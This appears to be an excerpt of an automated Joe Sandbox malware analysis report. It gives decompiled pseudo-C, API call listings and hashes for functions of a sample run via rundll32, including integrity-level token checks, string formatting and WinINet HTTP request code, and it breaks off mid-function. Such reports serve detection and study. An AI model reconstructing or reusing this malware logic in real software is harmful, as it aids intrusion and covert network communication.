                    0x0444564c
                    0x04445650
                    0x04445655
                    0x04445655
                    0x04445657
                    0x0444565c
                    0x04445660
                    0x04445665
                    0x04445665
                    0x04445667
                    0x0444566c
                    0x04445670
                    0x04445675
                    0x04445675
                    0x04445677
                    0x04445682
                    0x04445685
                    0x04445685
                    0x04445687
                    0x0444568c
                    0x0444568f
                    0x0444568f
                    0x04445691
                    0x04445698
                    0x0444569b
                    0x044456a0
                    0x044456a3
                    0x044456a3
                    0x044456a6
                    0x044456ab
                    0x044456ae
                    0x044456ae
                    0x044456b3
                    0x044456b7
                    0x044456ba
                    0x044456ba
                    0x044456bf
                    0x044456c4
                    0x00000000
                    0x044456c7
                    0x044456ce

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04445650
                    • InternetCloseHandle.WININET(?), ref: 04445655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04445660
                    • InternetCloseHandle.WININET(?), ref: 04445665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04445670
                    • InternetCloseHandle.WININET(?), ref: 04445675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04441B44,?,?,00000000,00000000,74E481D0), ref: 04445685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04441B44,?,?,00000000,00000000,74E481D0), ref: 0444568F
                      • Part of subcall function 04445867: WaitForMultipleObjects.KERNEL32(00000002,04447AF8,00000000,04447AF8,?,?,?,04447AF8,0000EA60), ref: 04445882
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: 6ed40086ca2654cc2d38b49f3c1f9b3c8cec32df1f4250f87d6b301fbdcdd726
                    • Instruction ID: 30b769fe48036c89f6db11b6b6c6790f2b0a36bbf49fbfa752b86ea94528e99e
                    • Opcode Fuzzy Hash: 6ed40086ca2654cc2d38b49f3c1f9b3c8cec32df1f4250f87d6b301fbdcdd726
                    • Instruction Fuzzy Hash: 37110D756007486BEE70AFAAEC84C1BB7F9ABC53843550D1EE18AD3610C735FC848A68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044413CF Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E044413CF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x444a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E044463FD(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E044417AB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                    0x044413dc
                    0x044413e3
                    0x044413ea
                    0x044413fe
                    0x04441409
                    0x04441421
                    0x0444142e
                    0x04441431
                    0x04441436
                    0x04441441
                    0x04441445
                    0x04441454
                    0x04441458
                    0x04441474
                    0x04441474
                    0x04441478
                    0x04441478
                    0x0444147d
                    0x04441481
                    0x04441487
                    0x04441488
                    0x0444148f
                    0x04441495

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04441401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04441421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04441431
                    • CloseHandle.KERNEL32(00000000), ref: 04441481
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04441454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0444145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0444146C
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: 4cae2a2fcd4650d000b85ee693f5d86b4d1e07d1a4030958e0c39eff6c8b2085
                    • Instruction ID: aa9be285609e69990672221de617b7ea3a262591e66d35718125a98908a883aa
                    • Opcode Fuzzy Hash: 4cae2a2fcd4650d000b85ee693f5d86b4d1e07d1a4030958e0c39eff6c8b2085
                    • Instruction Fuzzy Hash: 1A213C79900209FFFF009FA4DC49EEEBBB9EB84304F0040A6E510A6251C7755E44EB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044418BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E044418BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x444a320; // 0xafd5a8
				_t1 = _t9 + 0x444b62c; // 0x253d7325
				_t36 = 0;
				_t28 = E044461A7(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E044463FD(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04447885(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E044417AB(_t40);
						_t42 = E04446863(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E044417AB(_t36);
							_t36 = _t42;
						}
						_t43 = E04445ACD(_t36, _t33);
						if(_t43 != 0) {
							E044417AB(_t36);
							_t36 = _t43;
						}
					}
					E044417AB(_t28);
				}
				return _t36;
			}
















                    0x044418ba
                    0x044418bd
                    0x044418be
                    0x044418c5
                    0x044418cc
                    0x044418d3
                    0x044418d7
                    0x044418de
                    0x044418e5
                    0x044418ea
                    0x044418fc
                    0x04441900
                    0x04441904
                    0x0444190a
                    0x0444190f
                    0x04441919
                    0x0444191f
                    0x04441921
                    0x04441938
                    0x0444193c
                    0x0444193f
                    0x04441944
                    0x04441944
                    0x0444194d
                    0x04441951
                    0x04441954
                    0x04441959
                    0x04441959
                    0x04441951
                    0x0444195c
                    0x04441961
                    0x04441967

                    APIs
                      • Part of subcall function 044461A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,044418D3,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 0444620E
                      • Part of subcall function 044461A7: sprintf.NTDLL ref: 0444622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 044418E5
                    • lstrlen.KERNEL32(?,?,?,04446ABB,?,04F495B0), ref: 044418ED
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • strcpy.NTDLL ref: 04441904
                    • lstrcat.KERNEL32(00000000,?), ref: 0444190F
                      • Part of subcall function 04447885: lstrlen.KERNEL32(?,?,?,00000000,?,0444191E,00000000,?,?,?,04446ABB,?,04F495B0), ref: 04447896
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04446ABB,?,04F495B0), ref: 0444192C
                      • Part of subcall function 04446863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04441938,00000000,?,?,04446ABB,?,04F495B0), ref: 0444686D
                      • Part of subcall function 04446863: _snprintf.NTDLL ref: 044468CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 14ea584244668112131bac633404378b3e0bc67423e01df3bcb845c2cc63297c
                    • Instruction ID: 4b7a94fed2eb8997cc09e74a3e722dc4cbf4af39fdcf167d7a11cc352250ffab
                    • Opcode Fuzzy Hash: 14ea584244668112131bac633404378b3e0bc67423e01df3bcb845c2cc63297c
                    • Instruction Fuzzy Hash: 0811C67B90152577BF127BB69C88C6F36BD9EC56A8309011BF501A7202DF38ED4297A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04441E51 Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 341 4441e51-4441e9d SysAllocString 342 4441fc1-4441fc4 341->342 343 4441ea3-4441ecf 341->343 344 4441fc6-4441fc9 SafeArrayDestroy 342->344 345 4441fcf-4441fd2 342->345 349 4441ed5-4441ee1 call 44456cf 343->349 350 4441fbe 343->350 344->345 347 4441fd4-4441fd7 SysFreeString 345->347 348 4441fdd-4441fe4 345->348 347->348 349->350 353 4441ee7-4441ef7 349->353 350->342 353->350 355 4441efd-4441f23 IUnknown_QueryInterface_Proxy 353->355 355->350 357 4441f29-4441f3d 355->357 359 4441f3f-4441f42 357->359 360 4441f7b-4441f7e 357->360 359->360 363 4441f44-4441f5b StrStrIW 359->363 361 4441fb5-4441fba 360->361 362 4441f80-4441f85 360->362 361->350 362->361 364 4441f87-4441f92 call 44457a8 362->364 365 4441f72-4441f75 SysFreeString 363->365 366 4441f5d-4441f66 call 4443d67 363->366 369 4441f97-4441f9b 364->369 365->360 366->365 372 4441f68-4441f70 call 44456cf 366->372 369->361 371 4441f9d-4441fa2 369->371 373 4441fa4-4441fae 371->373 374 4441fb0 371->374 372->365 373->361 374->361
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 04441E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04441F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 04441F53
                    • SysFreeString.OLEAUT32(?), ref: 04441F75
                      • Part of subcall function 04443D67: SysAllocString.OLEAUT32(04449290), ref: 04443DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 04441FC9
                    • SysFreeString.OLEAUT32(?), ref: 04441FD7
                      • Part of subcall function 044456CF: Sleep.KERNEL32(000001F4), ref: 04445717
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: b36c7af522cbf22bde372d8e1c46cf1113afdfd00964bf4b4ad518dfa151288b
                    • Instruction ID: 67fe736a7419ed8be65b8b988537eef0425cabd7ffa71fe22890f54c4cf76fae
                    • Opcode Fuzzy Hash: b36c7af522cbf22bde372d8e1c46cf1113afdfd00964bf4b4ad518dfa151288b
                    • Instruction Fuzzy Hash: DD510E76900209AFEF11DFA4C8888AEB7B6FFC8344B158929E515EB210D735AD46CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044443D8 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 44443d8-44443e7 378 44443e9-44443f9 call 444395b 377->378 379 44443fb-44443ff call 4447a34 377->379 378->379 384 444444a GetLastError 378->384 383 4444404-4444406 379->383 385 4444445-4444448 383->385 386 4444408-444442d ResetEvent * 2 HttpSendRequestA 383->386 387 444444c-444444e 384->387 385->384 385->387 388 444442f-4444436 GetLastError 386->388 389 444443a-444443d SetEvent 386->389 388->385 390 4444438 388->390 391 4444443 389->391 390->391 391->385
                    C-Code - Quality: 100%
                    			E044443D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E0444395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04447A34(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                    0x044443d8
                    0x044443e5
                    0x044443e7
                    0x0444444a
                    0x00000000
                    0x0444444a
                    0x044443ff
                    0x04444406
                    0x04444412
                    0x04444417
                    0x0444442d
                    0x0444443d
                    0x00000000
                    0x0444442f
                    0x0444442f
                    0x04444436
                    0x04444443
                    0x04444443
                    0x04444443
                    0x04444436
                    0x0444442d
                    0x04444448
                    0x00000000
                    0x00000000
                    0x0444444e

                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04441AE3,?,?,00000000,00000000), ref: 04444412
                    • ResetEvent.KERNEL32(?), ref: 04444417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04444424
                    • GetLastError.KERNEL32 ref: 0444442F
                    • GetLastError.KERNEL32(?,?,00000102,04441AE3,?,?,00000000,00000000), ref: 0444444A
                      • Part of subcall function 0444395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,044443F7,?,?,?,?,00000102,04441AE3,?,?,00000000), ref: 04443967
                      • Part of subcall function 0444395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044443F7,?,?,?,?,00000102,04441AE3,?), ref: 044439C5
                      • Part of subcall function 0444395B: lstrcpy.KERNEL32(00000000,00000000), ref: 044439D5
                    • SetEvent.KERNEL32(?), ref: 0444443D
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: b8f45e9528d3eb86810c1e9801d5ef2b3b8f79003d1591cc91d7cc5ea795298b
                    • Instruction ID: 2ebf105dbfb4e0ffc899834781d0d056591c2e7474644492b478dfa5a91c98f8
                    • Opcode Fuzzy Hash: b8f45e9528d3eb86810c1e9801d5ef2b3b8f79003d1591cc91d7cc5ea795298b
                    • Instruction Fuzzy Hash: 97016D31204200ABFF316F71DC46F5B7AA8EFC4729F20462AF551A21E0DB20F805EA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04443A12 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 4443a12-4443a57 wsprintfA 393 4443a59-4443a61 RtlAllocateHeap 392->393 394 4443a7b-4443a83 RtlAllocateHeap 392->394 396 4443aa0 393->396 397 4443a63-4443a74 call 4442fc4 393->397 395 4443a85-4443a96 call 44468eb 394->395 394->396 402 4443a9b-4443a9e 395->402 400 4443aa7-4443aab 396->400 401 4443a79 397->401 403 4443ae5 400->403 404 4443aad-4443ac8 call 44452a9 call 4444dc8 400->404 401->402 402->400 405 4443aeb-4443af2 403->405 410 4443af5-4443b06 404->410 411 4443aca-4443ad9 call 4445f6a 404->411 410->405 412 4443b08-4443b0f 410->412 411->403 412->405
                    C-Code - Quality: 65%
                    			E04443A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t37;
				void* _t38;
				intOrPtr* _t43;
				void* _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t48 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x444a320; // 0xafd5a8
				_t2 = _t22 + 0x444b682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x444a3e0; // 0x4f49b60
				_push(0x800);
				_push(0);
				_push( *0x444a2d8);
				if( *0x444a2ec >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x444a2ec =  *0x444a2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E044452A9(_t52, _t50); // executed
						_t30 = E04444DC8(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x444a2ec < 5) {
								 *0x444a2ec =  *0x444a2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E04445F6A();
						RtlFreeHeap( *0x444a2d8, 0, _t50); // executed
						goto L10;
					}
					_t37 = E044468EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				_t38 = RtlAllocateHeap(); // executed
				if(_t38 == 0) {
					goto L6;
				}
				_t37 = E04442FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
				goto L5;
			}
















                    0x04443a12
                    0x04443a12
                    0x04443a19
                    0x04443a20
                    0x04443a24
                    0x04443a29
                    0x04443a34
                    0x04443a3a
                    0x04443a4a
                    0x04443a4f
                    0x04443a51
                    0x04443a57
                    0x04443a83
                    0x04443aa0
                    0x04443aa0
                    0x04443aa7
                    0x04443aab
                    0x04443ae5
                    0x04443ae5
                    0x04443aeb
                    0x04443af2
                    0x04443af2
                    0x04443aad
                    0x04443ab0
                    0x04443ab2
                    0x04443abf
                    0x04443ac1
                    0x04443ac8
                    0x04443aff
                    0x04443b04
                    0x04443b06
                    0x04443b08
                    0x04443b08
                    0x00000000
                    0x04443b06
                    0x04443aca
                    0x04443ad1
                    0x04443adf
                    0x00000000
                    0x04443adf
                    0x04443a96
                    0x04443a9b
                    0x04443a9b
                    0x00000000
                    0x04443a9b
                    0x04443a59
                    0x04443a61
                    0x00000000
                    0x00000000
                    0x04443a74
                    0x00000000

                    APIs
                    • wsprintfA.USER32 ref: 04443A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443A59
                      • Part of subcall function 04442FC4: GetTickCount.KERNEL32 ref: 04442FD8
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443028
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443045
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443065
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443091
                      • Part of subcall function 04442FC4: HeapFree.KERNEL32(00000000,00000000), ref: 044430A3
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 044430C4
                      • Part of subcall function 04442FC4: HeapFree.KERNEL32(00000000,00000000), ref: 044430D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 04443ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: 1afa15b8008cb8c7d0abdcf5cf54bf9015e98c13c696a9f01c22bba50de3f0e2
                    • Instruction ID: 657d163d7194208dfe90c9fff9e49b05ae6805741ea8541dd4a4a86b217d61f3
                    • Opcode Fuzzy Hash: 1afa15b8008cb8c7d0abdcf5cf54bf9015e98c13c696a9f01c22bba50de3f0e2
                    • Instruction Fuzzy Hash: 2A31487A640109EBFF11DFA5D884E9B7BACFB88755F008016F902E7280DB35A945DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04441000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 50%
                    			E04441000(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x444a3cc; // 0x4f495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x444a3cc; // 0x4f495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x444a030) {
					HeapFree( *0x444a2d8, 0, _t8);
				}
				_t9 = E04443B61(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x444a3cc; // 0x4f495b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                    0x04441000
                    0x04441000
                    0x04441009
                    0x04441019
                    0x04441019
                    0x0444101e
                    0x04441023
                    0x00000000
                    0x00000000
                    0x04441013
                    0x04441013
                    0x04441025
                    0x04441029
                    0x0444103b
                    0x0444103b
                    0x04441046
                    0x0444104b
                    0x0444104e
                    0x04441053
                    0x04441057
                    0x0444105d

                    APIs
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04441009
                    • Sleep.KERNEL32(0000000A), ref: 04441013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0444103B
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04441057
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 8ef180d1b55acc9aeda1cfe74b51a673b949759f13fbbf7753fd2ce4bfc0093e
                    • Instruction ID: 4952bd85d21f2c696e7a9cf6499a2d7f7ca330184a04a1c9e6e4314426c1967b
                    • Opcode Fuzzy Hash: 8ef180d1b55acc9aeda1cfe74b51a673b949759f13fbbf7753fd2ce4bfc0093e
                    • Instruction Fuzzy Hash: 23F0DAB92402919BFF249F69DC49B177BA4EBC0745B048406F801E7692D739EC90EB25
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04446535 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 57%
                    			E04446535(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04444843();
				if(_t21 != 0) {
					_t59 =  *0x444a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x444a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x444a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04441649( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x444a320; // 0xafd5a8
					if( *0x444a2fc > 5) {
						_t8 = _t26 + 0x444b5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x444b9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04445A2D(_t27, _t27);
					_t31 = E0444414A(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x444a310 =  *0x444a310 ^ 0x81bbe65d;
						_t32 = E044463FD(0x60);
						__eflags = _t32;
						 *0x444a3cc = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x444a3cc; // 0x4f495b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x444a3cc; // 0x4f495b0
							 *_t51 = 0x444b81a;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x444a2d8, 0, 0x43);
							__eflags = _t36;
							 *0x444a364 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x444a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x444a320; // 0xafd5a8
								_t13 = _t58 + 0x444b55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4449287);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E044421BC( ~_v8 &  *0x444a310, 0x444a00c); // executed
								_t42 = E04444EF3(0, _t55, _t63, 0x444a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04443C10(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
